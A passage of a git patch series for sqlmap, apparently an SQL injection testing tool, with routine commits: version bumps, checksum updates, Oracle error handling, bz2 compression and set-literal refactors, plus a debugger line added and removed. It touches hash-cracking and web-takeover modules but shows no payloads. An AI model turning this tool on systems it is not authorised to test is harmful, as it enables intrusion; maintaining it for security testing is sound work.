VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f127191b495..05005700407 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py -8bfcc9511c4956ad22b62aa2c8f6386e lib/core/common.py +27d1b0a4609eece643141408d1f18716 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -390a33fe4fce640f5f226a68a7007778 lib/core/settings.py +6d8165a67243d0bc98f7bbc4d9b1ec36 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py From a7bf4f47e6bae8440f87ca565c93c5059d7e6478 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 25 Jan 2018 12:13:33 +0100 Subject: [PATCH 011/428] Update related to the #2677 --- lib/core/settings.py | 2 +- plugins/dbms/oracle/connector.py | 7 ++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 9 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 67007eb7a83..16c59dd312e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.14" +VERSION = "1.2.1.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index aa6be3b19bf..c74770d0864 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -12,6 +12,7 @@ import logging import os +import re from lib.core.convert import utf8encode from lib.core.data import conf @@ -42,7 +43,11 @@ def connect(self): try: self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password, mode=cx_Oracle.SYSDBA) logger.info("successfully connected as SYSDBA") - except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError): + except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError), ex: + if "" in str(ex): + msg = re.sub(r'DPI-\d+:\s+|: "[^"]+"', "", str(ex)) + raise SqlmapConnectionException(msg) + try: self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password) except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError), msg: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 05005700407..2bcd0594354 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6d8165a67243d0bc98f7bbc4d9b1ec36 lib/core/settings.py +7bf6ba3c580b0a956d82189140784d17 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -173,7 +173,7 @@ d6836e2a6a308eb3536e2e7fc74fdc8b plugins/dbms/mysql/filesystem.py 88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py f30009816db6a0b41342301f0d657a01 plugins/dbms/mysql/takeover.py -9a50b600d65d178b374d19775d1f95e4 plugins/dbms/oracle/connector.py +120637663f66cbb40f44a3a3bb2260dc plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py From c5730ee88d35e0718efa94d17d673b942e54ee4a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 25 Jan 2018 12:23:54 +0100 Subject: [PATCH 012/428] Update related to the #2677 --- lib/core/settings.py | 2 +- plugins/dbms/oracle/connector.py | 6 ++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 16c59dd312e..6a4bbe4020a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.15" +VERSION = "1.2.1.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index c74770d0864..fc8946ada07 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -44,8 +44,10 @@ def connect(self): self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password, mode=cx_Oracle.SYSDBA) logger.info("successfully connected as SYSDBA") except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError), ex: - if "" in str(ex): - msg = re.sub(r'DPI-\d+:\s+|: "[^"]+"', "", str(ex)) + if "Oracle Client library" in str(ex): + msg = re.sub(r"DPI-\d+:\s+", "", str(ex)) + msg = re.sub(r': ("[^"]+")', r" (\g<1>)", msg) + msg = re.sub(r". See (http[^ ]+)", r'. See "\g<1>"', msg) raise SqlmapConnectionException(msg) try: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 2bcd0594354..30edc2ae44e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7bf6ba3c580b0a956d82189140784d17 lib/core/settings.py +d623d7a3c0c977964f451ca20b0b15aa lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -173,7 +173,7 @@ d6836e2a6a308eb3536e2e7fc74fdc8b plugins/dbms/mysql/filesystem.py 88b876f085fec2569a0697f4b69f41da plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py f30009816db6a0b41342301f0d657a01 plugins/dbms/mysql/takeover.py -120637663f66cbb40f44a3a3bb2260dc plugins/dbms/oracle/connector.py +999cb8d0d52820d30bdd4b3d658a765d plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py From 4bf20066eca90a3da6d2c5314c70b97a256c0ef4 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 25 Jan 2018 12:29:56 +0100 Subject: [PATCH 013/428] Update related to the #2769 --- lib/core/settings.py | 2 +- lib/utils/sqlalchemy.py | 10 +++++++++- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6a4bbe4020a..b20c9bab35d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.16" +VERSION = "1.2.1.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index 50f3d5cc8aa..ecbe9786af7 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -41,6 +41,8 @@ def __init__(self, dialect=None): def connect(self): if _sqlalchemy: + import pdb + pdb.set_trace() self.initConnection() try: @@ -54,7 +56,13 @@ def connect(self): if self.dialect: conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1) - engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False} if self.dialect == "sqlite" else {}) + if self.dialect == "sqlite": + engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False}) + elif self.dialect == "oracle": + engine = _sqlalchemy.create_engine(conf.direct, connect_args={"allow_twophase": False}) + else: + engine = _sqlalchemy.create_engine(conf.direct, connect_args={}) + self.connector = engine.connect() except (TypeError, ValueError): if "_get_server_version_info" in traceback.format_exc(): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 30edc2ae44e..7f9769f01af 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d623d7a3c0c977964f451ca20b0b15aa lib/core/settings.py +50a0f84801ca7dcc40fd3112320d3fe2 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -112,7 +112,7 @@ a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py -3abe64e696ad75ad28cadf2695a58be8 lib/utils/sqlalchemy.py +d0c473a44e2967d9ba2af688d34b9194 lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py e426eae9ddf6a42bcb6b7355e2c2936f lib/utils/versioncheck.py 1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py From 02661c166dfa5b1dc97d22ca6a7f8ac10d290d55 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 25 Jan 2018 12:31:22 +0100 Subject: [PATCH 014/428] Removing leftover pdb (#2769) --- lib/core/settings.py | 2 +- lib/utils/sqlalchemy.py | 2 -- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b20c9bab35d..04fb56a80df 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.17" +VERSION = "1.2.1.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index ecbe9786af7..3644a6d2453 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -41,8 +41,6 @@ def __init__(self, dialect=None): def connect(self): if _sqlalchemy: - import pdb - pdb.set_trace() self.initConnection() try: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7f9769f01af..b85c14203c3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -50a0f84801ca7dcc40fd3112320d3fe2 lib/core/settings.py +1349fdfa1f60244969299a4431024420 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -112,7 +112,7 @@ a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 5d6d73d27833eef1b10b9215629533ff lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py -d0c473a44e2967d9ba2af688d34b9194 lib/utils/sqlalchemy.py +4b17311256f0081904a67831252e3fb9 lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py e426eae9ddf6a42bcb6b7355e2c2936f lib/utils/versioncheck.py 1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py From fd8bbaff9f102480482525e7bcacd606d2b504ff Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 00:15:11 +0100 Subject: [PATCH 015/428] Minor update of error regexes --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/errors.xml | 4 ++++ 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 04fb56a80df..af9455b436b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.18" +VERSION = "1.2.1.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b85c14203c3..bf3edc07244 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -1349fdfa1f60244969299a4431024420 lib/core/settings.py +0fe2ab6fe688d723c96b1f0326d4bdb5 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -461,7 +461,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml 817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml -9567590d35dfd9f214b9979e6000b139 xml/errors.xml +0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml 14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml diff --git a/xml/errors.xml b/xml/errors.xml index e84ad922e46..a4c95b2a526 100644 --- a/xml/errors.xml +++ b/xml/errors.xml @@ -6,10 +6,12 @@ + + @@ -35,9 +37,11 @@ + + From 30f8c30d6aa5a9420d3900bb1ccfb5bbbfb0eaf6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 10:36:13 +0100 Subject: [PATCH 016/428] Minor update --- lib/core/bigarray.py | 8 ++++---- lib/core/settings.py | 4 ++-- lib/utils/versioncheck.py | 4 ++-- txt/checksum.md5 | 6 +++--- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 51f93404a8e..f733b81cbe5 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -10,11 +10,11 @@ except: import pickle +import bz2 import itertools import os import sys import tempfile -import zlib from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapSystemException @@ -86,7 +86,7 @@ def pop(self): self.chunks.pop() try: with open(self.chunks[-1], "rb") as f: - self.chunks[-1] = pickle.loads(zlib.decompress(f.read())) + self.chunks[-1] = pickle.loads(bz2.decompress(f.read())) except IOError, ex: errMsg = "exception occurred while retrieving data " errMsg += "from a temporary file ('%s')" % ex.message @@ -107,7 +107,7 @@ def _dump(self, chunk): self.filenames.add(filename) os.close(handle) with open(filename, "w+b") as f: - f.write(zlib.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL)) + f.write(bz2.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL)) return filename except (OSError, IOError), ex: errMsg = "exception occurred while storing data " @@ -125,7 +125,7 @@ def _checkcache(self, index): if not (self.cache and self.cache.index == index): try: with open(self.chunks[index], "rb") as f: - self.cache = Cache(index, pickle.loads(zlib.decompress(f.read())), False) + self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False) except IOError, ex: errMsg = "exception occurred while retrieving data " errMsg += "from a temporary file ('%s')" % ex.message diff --git a/lib/core/settings.py b/lib/core/settings.py index af9455b436b..98fd3f55f86 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.19" +VERSION = "1.2.1.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -531,7 +531,7 @@ # Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory) BIGARRAY_CHUNK_SIZE = 1024 * 1024 -# Compress (zlib) level used for storing BigArray chunks to disk (0-9) +# Compress level used for storing BigArray chunks to disk (0-9) BIGARRAY_COMPRESS_LEVEL = 9 # Maximum number of socket pre-connects diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index ae2a15e118b..21249997bfb 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -10,9 +10,9 @@ PYVERSION = sys.version.split()[0] if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) + exit("[CRITICAL] incompatible Python version detected ('%s'). To successfully run sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'https://www.python.org/downloads/')" % PYVERSION) -extensions = ("gzip", "ssl", "sqlite3", "zlib") +extensions = ("bz2", "gzip", "ssl", "sqlite3", "zlib") try: for _ in extensions: __import__(_) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bf3edc07244..1365a2102ac 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -26,7 +26,7 @@ ccd66880fc677a3c83db2a3a70d196d7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py -62fade52c1524364e6e0653c31143a9c lib/core/bigarray.py +86a4703d5474badd8462146510b2c460 lib/core/bigarray.py 27d1b0a4609eece643141408d1f18716 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0fe2ab6fe688d723c96b1f0326d4bdb5 lib/core/settings.py +2ef6392db210a10901554ea061ee7256 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -114,7 +114,7 @@ a6d6888e14a7c11f0884c8cc18489caa lib/utils/getch.py 4a6886d3a0c7bf768df97738fa257de9 lib/utils/search.py 4b17311256f0081904a67831252e3fb9 lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py -e426eae9ddf6a42bcb6b7355e2c2936f lib/utils/versioncheck.py +ce5ec6300bc0a185827a21d8a8f09de3 lib/utils/versioncheck.py 1e9cf437451ff8147a372a002641b963 lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py From 31fa7f6c944dbc8a8930a5d92c216a819aee098a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 31 Jan 2018 10:50:34 +0100 Subject: [PATCH 017/428] Trivial update# --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- lib/takeover/web.py | 2 +- lib/utils/crawler.py | 2 +- lib/utils/har.py | 2 +- lib/utils/hash.py | 14 +++++++------- plugins/generic/enumeration.py | 6 +++--- txt/checksum.md5 | 14 +++++++------- 8 files changed, 22 insertions(+), 22 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 63d5f36cd31..a18daef0613 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -770,7 +770,7 @@ def getManualDirectories(): checkFile(listPath) directories = getFileItems(listPath) elif choice == '4': - targets = set([conf.hostname]) + targets = {conf.hostname} _ = conf.hostname.split('.') if _[0] == "www": diff --git a/lib/core/settings.py b/lib/core/settings.py index 98fd3f55f86..e0b9fe0158c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.1.20" +VERSION = "1.2.1.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 2952a127f0b..88df01687a3 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -205,7 +205,7 @@ def webInit(self): if readInput(message, default='Y', boolean=True): headers = {} - been = set([conf.url]) + been = {conf.url} for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I): url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php") diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py index 6c844859474..10ba77a4b58 100644 --- a/lib/utils/crawler.py +++ b/lib/utils/crawler.py @@ -126,7 +126,7 @@ def crawlThread(): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() - threadData.shared.unprocessed = set([target]) + threadData.shared.unprocessed = {target} if not conf.sitemapUrl: message = "do you want to check for the existence of " diff --git a/lib/utils/har.py b/lib/utils/har.py index 4def9b3db45..19fc7b67807 100644 --- a/lib/utils/har.py +++ b/lib/utils/har.py @@ -180,7 +180,7 @@ def toDict(self): "size": len(self.content or "") } - binary = set(['\0', '\1']) + binary = {'\0', '\1'} if any(c in binary for c in self.content): content["encoding"] = "base64" content["text"] = base64.b64encode(self.content) diff --git a/lib/utils/hash.py b/lib/utils/hash.py index dcc11bbb8e2..bafe2a80138 100644 --- a/lib/utils/hash.py +++ b/lib/utils/hash.py @@ -693,9 +693,7 @@ def hashRecognition(value): if isinstance(value, basestring): for name, regex in getPublicTypeMembers(HASH): # Hashes for Oracle and old MySQL look the same hence these checks - if isOracle and regex == HASH.MYSQL_OLD: - continue - elif isMySQL and regex == HASH.ORACLE_OLD: + if isOracle and regex == HASH.MYSQL_OLD or isMySQL and regex == HASH.ORACLE_OLD: continue elif regex == HASH.CRYPT_GENERIC: if any((value.lower() == value, value.upper() == value)): @@ -712,7 +710,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc count = 0 rotator = 0 - hashes = set([item[0][1] for item in attack_info]) + hashes = set(item[0][1] for item in attack_info) wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) @@ -758,7 +756,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc if rotator >= len(ROTATING_CHARS): rotator = 0 - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) @@ -827,12 +825,14 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 + if rotator >= len(ROTATING_CHARS): rotator = 0 - status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) + + status = "current status: %s... %s" % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if user and not user.startswith(DUMMY_USER_PREFIX): - status += ' (user: %s)' % user + status += " (user: %s)" % user if not api: dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 0b6190ae473..3983b6b30ca 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -60,13 +60,13 @@ def getBanner(self): bannerParser(kb.data.banner) if conf.os and conf.os == "windows": - kb.bannerFp["type"] = set(["Windows"]) + kb.bannerFp["type"] = {"Windows"} elif conf.os and conf.os == "linux": - kb.bannerFp["type"] = set(["Linux"]) + kb.bannerFp["type"] = {"Linux"} elif conf.os: - kb.bannerFp["type"] = set(["%s%s" % (conf.os[0].upper(), conf.os[1:])]) + kb.bannerFp["type"] = {"%s%s" % (conf.os[0].upper(), conf.os[1:])} if conf.os: setOs() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 1365a2102ac..a9c50c7487b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -27,7 +27,7 @@ a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e3a3f5218b2e52dd0afafdfc9fed2002 lib/core/agent.py 86a4703d5474badd8462146510b2c460 lib/core/bigarray.py -27d1b0a4609eece643141408d1f18716 lib/core/common.py +e4fa4177b9d3c24555fb275335496e29 lib/core/common.py 2a40d5b5997265daa890545d4a4a59b9 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2ef6392db210a10901554ea061ee7256 lib/core/settings.py +4f27b5c4801cad5c6b8361f953a4f313 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py @@ -85,7 +85,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py 703e15714316a8cc4bbe54cdd0a8cb87 lib/takeover/metasploit.py 0fc9b00596df21c8878ef92f513ecad7 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py -1398cb4ee55becf628367854b5310f33 lib/takeover/web.py 